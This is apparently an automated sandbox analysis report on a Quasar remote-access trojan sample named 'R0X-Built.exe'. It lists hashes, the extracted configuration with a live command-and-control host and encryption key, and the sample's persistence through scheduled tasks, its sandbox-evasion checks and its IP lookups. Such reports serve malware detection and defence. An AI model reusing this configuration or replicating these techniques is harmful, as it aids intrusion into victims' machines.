Analysis
-
max time kernel
150s -
max time network
148s -
platform
windows10-2004_x64 -
resource
win10v2004-20240508-en -
resource tags
arch:x64arch:x86image:win10v2004-20240508-enlocale:en-usos:windows10-2004-x64system -
submitted
10-05-2024 06:27
General
-
Target
R0X-Built.exe
-
Size
409KB
-
MD5
a4a9308ce3b465b6b2dccb94b86d8a83
-
SHA1
7e594db5d7adbffa0ca6cadad7a8b037156d90cc
-
SHA256
98bbe270ca87c08856cc3dceafef76824baa96fe031d7f00f0517b2fd898e117
-
SHA512
393af569d8d3cbe2a12fe0c938ccd15ff2247cd1e916de71b8567cb0beb7aa93991735baf9e00db657fa626e797a70699f290a96405a8abf03c3bb24e25f977b
-
SSDEEP
12288:bpiREGJofVF99JK03/Mi57Ey6srDZkRYjT5+Mn2FyaZs:1wpJy9JK0PMi5oivSdi
Malware Config
Extracted
quasar
3.1.5
Slave
looking-memphis.gl.at.ply.gg:45119:41251
$Sxr-3vDee7FzoJnhqjuE3n
-
encryption_key
740ewEJmzLdsHQMggIQI
-
install_name
$srr-powershell.exe
-
log_directory
Logs
-
reconnect_delay
1000
-
startup_key
$srr-powershell
-
subdirectory
Windows
Signatures
-
Quasar payload 11 IoCs
resource yara_rule behavioral1/memory/2816-1-0x0000000000EE0000-0x0000000000F4C000-memory.dmp family_quasar behavioral1/files/0x0009000000023440-11.dat family_quasar behavioral1/memory/2012-756-0x0000000000800000-0x000000000086C000-memory.dmp family_quasar behavioral1/memory/3568-860-0x0000000000500000-0x000000000056C000-memory.dmp family_quasar behavioral1/memory/3212-986-0x0000000000C20000-0x0000000000C8C000-memory.dmp family_quasar behavioral1/memory/3300-1102-0x00000000000B0000-0x000000000011C000-memory.dmp family_quasar behavioral1/memory/972-1227-0x0000000000080000-0x00000000000EC000-memory.dmp family_quasar behavioral1/memory/2468-1335-0x0000000000690000-0x00000000006FC000-memory.dmp family_quasar behavioral1/memory/3344-1579-0x0000000000AC0000-0x0000000000B2C000-memory.dmp family_quasar behavioral1/memory/212-1658-0x0000000000DB0000-0x0000000000E1C000-memory.dmp family_quasar behavioral1/memory/2556-1871-0x0000000000280000-0x00000000002EC000-memory.dmp family_quasar -
Suspicious use of NtCreateUserProcessOtherParentProcess 1 IoCs
description pid Process procid_target PID 1964 created 612 1964 powershell.EXE 5 -
Downloads MZ/PE file
-
Checks BIOS information in registry 2 TTPs 2 IoCs
BIOS information is often read in order to detect sandboxing environments.
description ioc Process Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosDate wmiprvse.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion wmiprvse.exe -
Checks computer location settings 2 TTPs 14 IoCs
Looks up country code configured in the registry, likely geofence.
description ioc Process Key value queried \REGISTRY\USER\S-1-5-21-2804150937-2146708401-419095071-1000\Control Panel\International\Geo\Nation $srr-powershell.exe Key value queried \REGISTRY\USER\S-1-5-21-2804150937-2146708401-419095071-1000\Control Panel\International\Geo\Nation $srr-powershell.exe Key value queried \REGISTRY\USER\S-1-5-21-2804150937-2146708401-419095071-1000\Control Panel\International\Geo\Nation $srr-powershell.exe Key value queried \REGISTRY\USER\S-1-5-21-2804150937-2146708401-419095071-1000\Control Panel\International\Geo\Nation $srr-powershell.exe Key value queried \REGISTRY\USER\S-1-5-21-2804150937-2146708401-419095071-1000\Control Panel\International\Geo\Nation $srr-powershell.exe Key value queried \REGISTRY\USER\S-1-5-21-2804150937-2146708401-419095071-1000\Control Panel\International\Geo\Nation $srr-powershell.exe Key value queried \REGISTRY\USER\S-1-5-21-2804150937-2146708401-419095071-1000\Control Panel\International\Geo\Nation $srr-powershell.exe Key value queried \REGISTRY\USER\S-1-5-21-2804150937-2146708401-419095071-1000\Control Panel\International\Geo\Nation $srr-powershell.exe Key value queried \REGISTRY\USER\S-1-5-21-2804150937-2146708401-419095071-1000\Control Panel\International\Geo\Nation $srr-powershell.exe Key value queried \REGISTRY\USER\S-1-5-21-2804150937-2146708401-419095071-1000\Control Panel\International\Geo\Nation $srr-powershell.exe Key value queried \REGISTRY\USER\S-1-5-21-2804150937-2146708401-419095071-1000\Control Panel\International\Geo\Nation $srr-powershell.exe Key value queried \REGISTRY\USER\S-1-5-21-2804150937-2146708401-419095071-1000\Control Panel\International\Geo\Nation $srr-powershell.exe Key value queried \REGISTRY\USER\S-1-5-21-2804150937-2146708401-419095071-1000\Control Panel\International\Geo\Nation $srr-powershell.exe Key value queried \REGISTRY\USER\S-1-5-21-2804150937-2146708401-419095071-1000\Control Panel\International\Geo\Nation $srr-powershell.exe -
Executes dropped EXE 15 IoCs
pid Process 4788 $srr-powershell.exe 4592 install.exe 2012 $srr-powershell.exe 3568 $srr-powershell.exe 3212 $srr-powershell.exe 3300 $srr-powershell.exe 972 $srr-powershell.exe 2468 $srr-powershell.exe 1056 $srr-powershell.exe 4216 $srr-powershell.exe 3344 $srr-powershell.exe 212 $srr-powershell.exe 2516 $srr-powershell.exe 2780 $srr-powershell.exe 2556 $srr-powershell.exe -
Legitimate hosting services abused for malware hosting/C2 1 TTPs 2 IoCs
flow ioc 25 raw.githubusercontent.com 26 raw.githubusercontent.com -
Looks up external IP address via web service 3 IoCs
Uses a legitimate IP lookup service to find the infected system's external IP.
flow ioc 21 ip-api.com 57 ip-api.com 70 ip-api.com -
Drops file in System32 directory 37 IoCs
description ioc Process File created C:\Windows\SysWOW64\Windows\$srr-powershell.exe R0X-Built.exe File opened for modification C:\Windows\SysWOW64\Windows\$srr-powershell.exe $srr-powershell.exe File opened for modification C:\Windows\SysWOW64\Windows $srr-powershell.exe File opened for modification C:\Windows\SysWOW64\Windows $srr-powershell.exe File opened for modification C:\Windows\SysWOW64\Windows $srr-powershell.exe File opened for modification C:\Windows\SysWOW64\Windows $srr-powershell.exe File opened for modification C:\Windows\SysWOW64\Windows\$srr-powershell.exe $srr-powershell.exe File opened for modification C:\Windows\System32\Tasks\$srr-powershell svchost.exe File opened for modification C:\Windows\SysWOW64\Windows\$srr-powershell.exe R0X-Built.exe File opened for modification C:\Windows\System32\Winevt\Logs\Microsoft-Windows-Security-Mitigations%4UserMode.evtx svchost.exe File opened for modification C:\Windows\SysWOW64\Windows\$srr-powershell.exe $srr-powershell.exe File opened for modification C:\Windows\SysWOW64\Windows $srr-powershell.exe File opened for modification C:\Windows\SysWOW64\Windows\$srr-powershell.exe $srr-powershell.exe File created C:\Windows\system32\config\systemprofile\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive powershell.EXE File opened for modification C:\Windows\SysWOW64\Windows\$srr-powershell.exe $srr-powershell.exe File opened for modification C:\Windows\SysWOW64\Windows $srr-powershell.exe File opened for modification C:\Windows\SysWOW64\Windows\$srr-powershell.exe $srr-powershell.exe File opened for modification C:\Windows\SysWOW64\Windows\$srr-powershell.exe $srr-powershell.exe File opened for modification C:\Windows\SysWOW64\Windows $srr-powershell.exe File opened for modification C:\Windows\SysWOW64\Windows\$srr-powershell.exe $srr-powershell.exe File opened for modification C:\Windows\SysWOW64\Windows\$srr-powershell.exe $srr-powershell.exe File opened for modification C:\Windows\SysWOW64\Windows $srr-powershell.exe File opened for modification C:\Windows\System32\Winevt\Logs\Microsoft-Windows-Security-Mitigations%4KernelMode.evtx svchost.exe File opened for modification C:\Windows\SysWOW64\Windows\$srr-powershell.exe $srr-powershell.exe File opened for modification C:\Windows\SysWOW64\Windows $srr-powershell.exe File opened for modification C:\Windows\SysWOW64\Windows\$srr-powershell.exe $srr-powershell.exe File opened for modification C:\Windows\system32\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\FB0D848F74F70BB2EAA93746D24D9749 svchost.exe File opened for modification C:\Windows\SysWOW64\Windows $srr-powershell.exe File opened for modification C:\Windows\SysWOW64\Windows $srr-powershell.exe File opened for modification C:\Windows\SysWOW64\Windows\$srr-powershell.exe $srr-powershell.exe File opened for modification C:\Windows\SysWOW64\Windows\$srr-powershell.exe $srr-powershell.exe File opened for modification C:\Windows\SysWOW64\Windows $srr-powershell.exe File created C:\Windows\system32\config\systemprofile\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\powershell.EXE.log powershell.EXE File opened for modification C:\Windows\system32\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\57C8EDB95DF3F0AD4EE2DC2B8CFD4157 svchost.exe File opened for modification C:\Windows\SysWOW64\Windows\$srr-powershell.exe $srr-powershell.exe File opened for modification C:\Windows\SysWOW64\Windows $srr-powershell.exe File opened for modification C:\Windows\SysWOW64\Windows $srr-powershell.exe -
Suspicious use of SetThreadContext 1 IoCs
description pid Process procid_target PID 1964 set thread context of 3876 1964 powershell.EXE 99 -
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).
-
Checks SCSI registry key(s) 3 TTPs 18 IoCs
SCSI information is often read in order to detect sandboxing environments.
description ioc Process Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CDROM&VEN_QEMU&PROD_QEMU_DVD-ROM\4&215468A5&0&010000 wmiprvse.exe Key value queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_QEMU&Prod_QEMU_DVD-ROM\4&215468a5&0&010000\Service wmiprvse.exe Key value queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_DADY&Prod_HARDDISK\4&215468a5&0&000000\DeviceDesc wmiprvse.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\DISK&VEN_DADY&PROD_HARDDISK\4&215468A5&0&000000\LogConf wmiprvse.exe Key value queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_DADY&Prod_HARDDISK\4&215468a5&0&000000\FriendlyName wmiprvse.exe Key value queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_QEMU&Prod_QEMU_DVD-ROM\4&215468a5&0&010000\CompatibleIDs wmiprvse.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CDROM&VEN_QEMU&PROD_QEMU_DVD-ROM\4&215468A5&0&010000\LogConf wmiprvse.exe Key value queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_DADY&Prod_HARDDISK\4&215468a5&0&000000\HardwareID wmiprvse.exe Key value queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_QEMU&Prod_QEMU_DVD-ROM\4&215468a5&0&010000\DeviceDesc wmiprvse.exe Key value queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_QEMU&Prod_QEMU_DVD-ROM\4&215468a5&0&010000\ConfigFlags wmiprvse.exe Key value queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_QEMU&Prod_QEMU_DVD-ROM\4&215468a5&0&010000\FriendlyName wmiprvse.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\DISK&VEN_DADY&PROD_HARDDISK\4&215468A5&0&000000 wmiprvse.exe Key value queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_DADY&Prod_HARDDISK\4&215468a5&0&000000\Service wmiprvse.exe Key value queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_DADY&Prod_HARDDISK\4&215468a5&0&000000\ConfigFlags wmiprvse.exe Key value queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_QEMU&Prod_QEMU_DVD-ROM\4&215468a5&0&010000\HardwareID wmiprvse.exe Key value queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_QEMU&Prod_QEMU_DVD-ROM\4&215468a5&0&010000\Mfg wmiprvse.exe Key value queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_DADY&Prod_HARDDISK\4&215468a5&0&000000\CompatibleIDs wmiprvse.exe Key value queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_DADY&Prod_HARDDISK\4&215468a5&0&000000\Mfg wmiprvse.exe -
Creates scheduled task(s) 1 TTPs 16 IoCs
Schtasks is often used by malware for persistence or to perform post-infection execution.
pid Process 5016 SCHTASKS.exe 4888 schtasks.exe 2376 schtasks.exe 4080 schtasks.exe 2632 schtasks.exe 1440 schtasks.exe 1488 schtasks.exe 4036 schtasks.exe 2952 schtasks.exe 4952 schtasks.exe 1456 schtasks.exe 636 schtasks.exe 2336 schtasks.exe 2908 schtasks.exe 1480 schtasks.exe 452 schtasks.exe -
Enumerates system info in registry 2 TTPs 1 IoCs
description ioc Process Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\Identifier wmiprvse.exe -
Modifies data under HKEY_USERS 53 IoCs
description ioc Process Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust\CRLs powershell.EXE Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\WinTrust\Trust Providers\Software Publishing powershell.EXE Set value (str) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Office\16.0\Common\ClientTelemetry\RulesMetadata\officeclicktorun.exe\ULSMonitor\ULSTagIds0 = "5804129,17110992,7202269,41484365,17110988,7153487,39965824,17962391,508368333,17962392,3462423,3702920,3700754,3965062,4297094,7153421,18716193,7153435,7202265,20502174,6308191,18407617" OfficeClickToRun.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed\CTLs powershell.EXE Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople\CRLs powershell.EXE Key deleted \REGISTRY\USER\.DEFAULT\Software\Microsoft\Office\16.0\Common\ClientTelemetry\RulesMetadata\officeclicktorun.exe OfficeClickToRun.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\Office\16.0\Common\ClientTelemetry\RulesMetadata OfficeClickToRun.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed\Certificates powershell.EXE Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root\CRLs powershell.EXE Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust\CRLs powershell.EXE Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed powershell.EXE Key deleted \REGISTRY\USER\.DEFAULT\SOFTWARE\MICROSOFT\OFFICE\16.0\COMMON\CLIENTTELEMETRY\RULESMETADATA\OFFICECLICKTORUN.EXE\ULSMONITOR OfficeClickToRun.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\Office\16.0\Common OfficeClickToRun.exe Set value (str) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Office\16.0\Common\ClientTelemetry\RulesMetadata\officeclicktorun.exe\ULSMonitor\ULSCategoriesSeverities = "1329 10,1329 50,1329 15,1329 100,1329 6" OfficeClickToRun.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root\Certificates powershell.EXE Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA powershell.EXE Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot\CRLs powershell.EXE Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust\CTLs powershell.EXE Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA\CTLs powershell.EXE Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople powershell.EXE Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\Office\16.0 OfficeClickToRun.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\Office\16.0\Common\ClientTelemetry OfficeClickToRun.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA powershell.EXE Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople\Certificates powershell.EXE Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\Office\16.0\Common\ClientTelemetry\RulesMetadata\officeclicktorun.exe OfficeClickToRun.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA\CRLs powershell.EXE Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA\CRLs powershell.EXE Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust powershell.EXE Set value (int) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Office\16.0\Common\ClientTelemetry\RulesLastModified\officeclicktorun.exe_queried = "1715322572" OfficeClickToRun.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed\Certificates powershell.EXE Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot powershell.EXE Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople\Certificates powershell.EXE Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople\CTLs powershell.EXE Key created \REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Connections svchost.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed\CRLs powershell.EXE Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root powershell.EXE Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople\CRLs powershell.EXE Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust\CTLs powershell.EXE Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot\CTLs powershell.EXE Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA\Certificates powershell.EXE Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed\CRLs powershell.EXE Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed\CTLs powershell.EXE Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust\Certificates powershell.EXE Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA\Certificates powershell.EXE Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA\CTLs powershell.EXE Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot\Certificates powershell.EXE Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople powershell.EXE Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople\CTLs powershell.EXE Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust powershell.EXE Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed powershell.EXE Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root\CTLs powershell.EXE Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust\Certificates powershell.EXE Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\Office\16.0\Common\ClientTelemetry\RulesMetadata\officeclicktorun.exe\ULSMonitor OfficeClickToRun.exe -
Modifies registry class 16 IoCs
description ioc Process Key created \REGISTRY\USER\S-1-5-21-2804150937-2146708401-419095071-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\SystemAppData\Microsoft.Windows.StartMenuExperienceHost_cw5n1h2txyewy\PersistedStorageItemTable\ManagedByApp RuntimeBroker.exe Key created \REGISTRY\USER\S-1-5-21-2804150937-2146708401-419095071-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\SystemAppData\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\PersistedStorageItemTable\System RuntimeBroker.exe Key created \REGISTRY\USER\S-1-5-21-2804150937-2146708401-419095071-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\SystemAppData\Microsoft.Windows.StartMenuExperienceHost_cw5n1h2txyewy\PersistedStorageItemTable RuntimeBroker.exe Key created \REGISTRY\USER\S-1-5-21-2804150937-2146708401-419095071-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\SystemAppData\Microsoft.Windows.StartMenuExperienceHost_cw5n1h2txyewy\PersistedStorageItemTable\CurrentWorkingDirectory RuntimeBroker.exe Set value (int) \REGISTRY\USER\S-1-5-21-2804150937-2146708401-419095071-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\SystemAppData\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\PersistedStorageItemTable\System\72a514ad-517e-46e7- = "8324" RuntimeBroker.exe Key deleted \REGISTRY\USER\S-1-5-21-2804150937-2146708401-419095071-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\SystemAppData\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\PersistedStorageItemTable\System\2a3de027-de23-44ff- RuntimeBroker.exe Key created \REGISTRY\USER\S-1-5-21-2804150937-2146708401-419095071-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\SystemAppData\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\PersistedStorageItemTable\System\72a514ad-517e-46e7- RuntimeBroker.exe Set value (data) \REGISTRY\USER\S-1-5-21-2804150937-2146708401-419095071-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\SystemAppData\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\PersistedStorageItemTable\System\72a514ad-517e-46e7- = 3f1abd36a3a2da01 RuntimeBroker.exe Set value (str) \REGISTRY\USER\S-1-5-21-2804150937-2146708401-419095071-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\SystemAppData\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\PersistedStorageItemTable\System\72a514ad-517e-46e7- = "Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy" RuntimeBroker.exe Set value (str) \REGISTRY\USER\S-1-5-21-2804150937-2146708401-419095071-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\SystemAppData\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\PersistedStorageItemTable\System\72a514ad-517e-46e7- = "\\\\?\\Volume{A968B372-0000-0000-0000-D01200000000}\\Users\\Admin\\AppData\\Local\\Packages\\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\\LocalState\\StagedAssets\\fd38823f3e602e0e5bcf38e1ce8ed239fbe14051a904705600876d41cdb35e20" RuntimeBroker.exe Set value (int) \REGISTRY\USER\S-1-5-21-2804150937-2146708401-419095071-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\SystemAppData\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\PersistedStorageItemTable\System\72a514ad-517e-46e7- = "0" RuntimeBroker.exe Set value (data) \REGISTRY\USER\S-1-5-21-2804150937-2146708401-419095071-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\SystemAppData\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\PersistedStorageItemTable\System\72a514ad-517e-46e7- = 0114020000000000c0000000000000464c0000000114020000000000c000000000000046830000002000000029db8c35a3a2da01d9e45936a3a2da01d9e45936a3a2da019c0400000000000001000000000000000000000000000000260514001f50e04fd020ea3a6910a2d808002b30309d19002f433a5c0000000000000000000000000000000000000050003100000000000000000010005573657273003c0009000400efbe00000000000000002e00000000000000000000000000000000000000000000000000000000005500730065007200730000001400500031000000000000000000100041646d696e003c0009000400efbe00000000000000002e0000000000000000000000000000000000000000000000000000000000410064006d0069006e000000140056003100000000000000000010004170704461746100400009000400efbe00000000000000002e000000000000000000000000000000000000000000000000000000000041007000700044006100740061000000160050003100000000000000000010004c6f63616c003c0009000400efbe00000000000000002e00000000000000000000000000000000000000000000000000000000004c006f00630061006c00000014005a003100000000000000000010005061636b616765730000420009000400efbe00000000000000002e00000000000000000000000000000000000000000000000000000000005000610063006b00610067006500730000001800e4003100000000000000000010004d6963726f736f66742e57696e646f77732e436f6e74656e7444656c69766572794d616e616765725f6377356e31683274787965777900009e0009000400efbe00000000000000002e00000000000000000000000000000000000000000000000000000000004d006900630072006f0073006f00660074002e00570069006e0064006f00770073002e0043006f006e00740065006e007400440065006c00690076006500720079004d0061006e0061006700650072005f006300770035006e003100680032007400780079006500770079000000460060003100000000000000000010004c6f63616c53746174650000460009000400efbe00000000000000002e00000000000000000000000000000000000000000000000000000000004c006f00630061006c005300740061007400650000001a00660031000000000000000000100053746167656441737365747300004a0009000400efbe00000000000000002e000000000000000000000000000000000000000000000000000000000053007400610067006500640041007300730065007400730000001c00ad01320000000000aa5881332000666433383832336633653630326530653562636633386531636538656432333966626531343035316139303437303536303038373664343163646233356532300000b20009000400efbeaa588133aa5881332e0000000000000000000000000000000000000000000000000089905f00660064003300380038003200330066003300650036003000320065003000650035006200630066003300380065003100630065003800650064003200330039006600620065003100340030003500310061003900300034003700300035003600300030003800370036006400340031006300640062003300350065003200300000005000ab0000002700efbe9d00000031535053b79daeff8d1cff43818c84403aa3732d8100000064000000001f000000370000004d006900630072006f0073006f00660074002e00570069006e0064006f00770073002e0043006f006e00740065006e007400440065006c00690076006500720079004d0061006e0061006700650072005f006300770035006e0031006800320074007800790065007700790000000000000000000000000050000000eb0000001c000000010000001c0000003400000000000000ea0000001800000003000000f5afbf871000000057696e646f777300433a5c55736572735c41646d696e5c417070446174615c4c6f63616c5c5061636b616765735c4d6963726f736f66742e57696e646f77732e436f6e74656e7444656c69766572794d616e616765725f6377356e3168327478796577795c4c6f63616c53746174655c5374616765644173736574735c66643338383233663365363032653065356263663338653163653865643233396662653134303531613930343730353630303837366434316364623335653230000010000000050000a028000000cd0000001c0000000b0000a08f856c5e220e60479afeea3317b67173cd00000060000000030000a0580000000000000072696a746f6f7678000000000000000072e9330fb5301f4a9e010962a32a67ec039592532d0def11a084c2748a3a93ce72e9330fb5301f4a9e010962a32a67ec039592532d0def11a084c2748a3a93cece000000090000a08900000031535053e28a5846bc4c3843bbfc139326986dce6d00000004000000001f0000002e00000053002d0031002d0035002d00320031002d0032003800300034003100350030003900330037002d0032003100340036003700300038003400300031002d003400310039003000390035003000370031002d0031003000300030000000000000003900000031535053b1166d44ad8d7048a748402ea43d788c1d00000068000000004800000072b368a9000000000000d01200000000000000000000000000000000 RuntimeBroker.exe Key deleted \REGISTRY\USER\S-1-5-21-2804150937-2146708401-419095071-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\SystemAppData\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\PersistedStorageItemTable\System\72a514ad-517e-46e7- RuntimeBroker.exe Key created \REGISTRY\USER\S-1-5-21-2804150937-2146708401-419095071-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\SystemAppData\Microsoft.Windows.StartMenuExperienceHost_cw5n1h2txyewy\PersistedStorageItemTable\MostRecentlyUsed RuntimeBroker.exe Key created \REGISTRY\USER\S-1-5-21-2804150937-2146708401-419095071-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\SystemAppData\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\PersistedStorageItemTable RuntimeBroker.exe Set value (str) \REGISTRY\USER\S-1-5-21-2804150937-2146708401-419095071-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\SystemAppData\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\PersistedStorageItemTable\System\72a514ad-517e-46e7- RuntimeBroker.exe -
Runs ping.exe 1 TTPs 14 IoCs
pid Process 4644 PING.EXE 1420 PING.EXE 4564 PING.EXE 972 PING.EXE 3604 PING.EXE 2084 PING.EXE 2540 PING.EXE 3360 PING.EXE 4392 PING.EXE 4508 PING.EXE 3100 PING.EXE 1988 PING.EXE 3208 PING.EXE 4732 PING.EXE -
Suspicious behavior: EnumeratesProcesses 64 IoCs
pid Process 1964 powershell.EXE 1964 powershell.EXE 1964 powershell.EXE 3876 dllhost.exe 3876 dllhost.exe 3876 dllhost.exe 3876 dllhost.exe 3876 dllhost.exe 3876 dllhost.exe 3876 dllhost.exe 3876 dllhost.exe 3876 dllhost.exe 3876 dllhost.exe 3876 dllhost.exe 3876 dllhost.exe 3876 dllhost.exe 3876 dllhost.exe 3876 dllhost.exe 3876 dllhost.exe 3876 dllhost.exe 3876 dllhost.exe 3876 dllhost.exe 3876 dllhost.exe 3876 dllhost.exe 3876 dllhost.exe 3876 dllhost.exe 3876 dllhost.exe 3876 dllhost.exe 3876 dllhost.exe 3876 dllhost.exe 3876 dllhost.exe 3876 dllhost.exe 3876 dllhost.exe 3876 dllhost.exe 3876 dllhost.exe 3876 dllhost.exe 3876 dllhost.exe 3876 dllhost.exe 3876 dllhost.exe 3876 dllhost.exe 3876 dllhost.exe 3876 dllhost.exe 3876 dllhost.exe 3876 dllhost.exe 3876 dllhost.exe 3876 dllhost.exe 3876 dllhost.exe 3876 dllhost.exe 3876 dllhost.exe 3876 dllhost.exe 3876 dllhost.exe 3876 dllhost.exe 3876 dllhost.exe 3876 dllhost.exe 3876 dllhost.exe 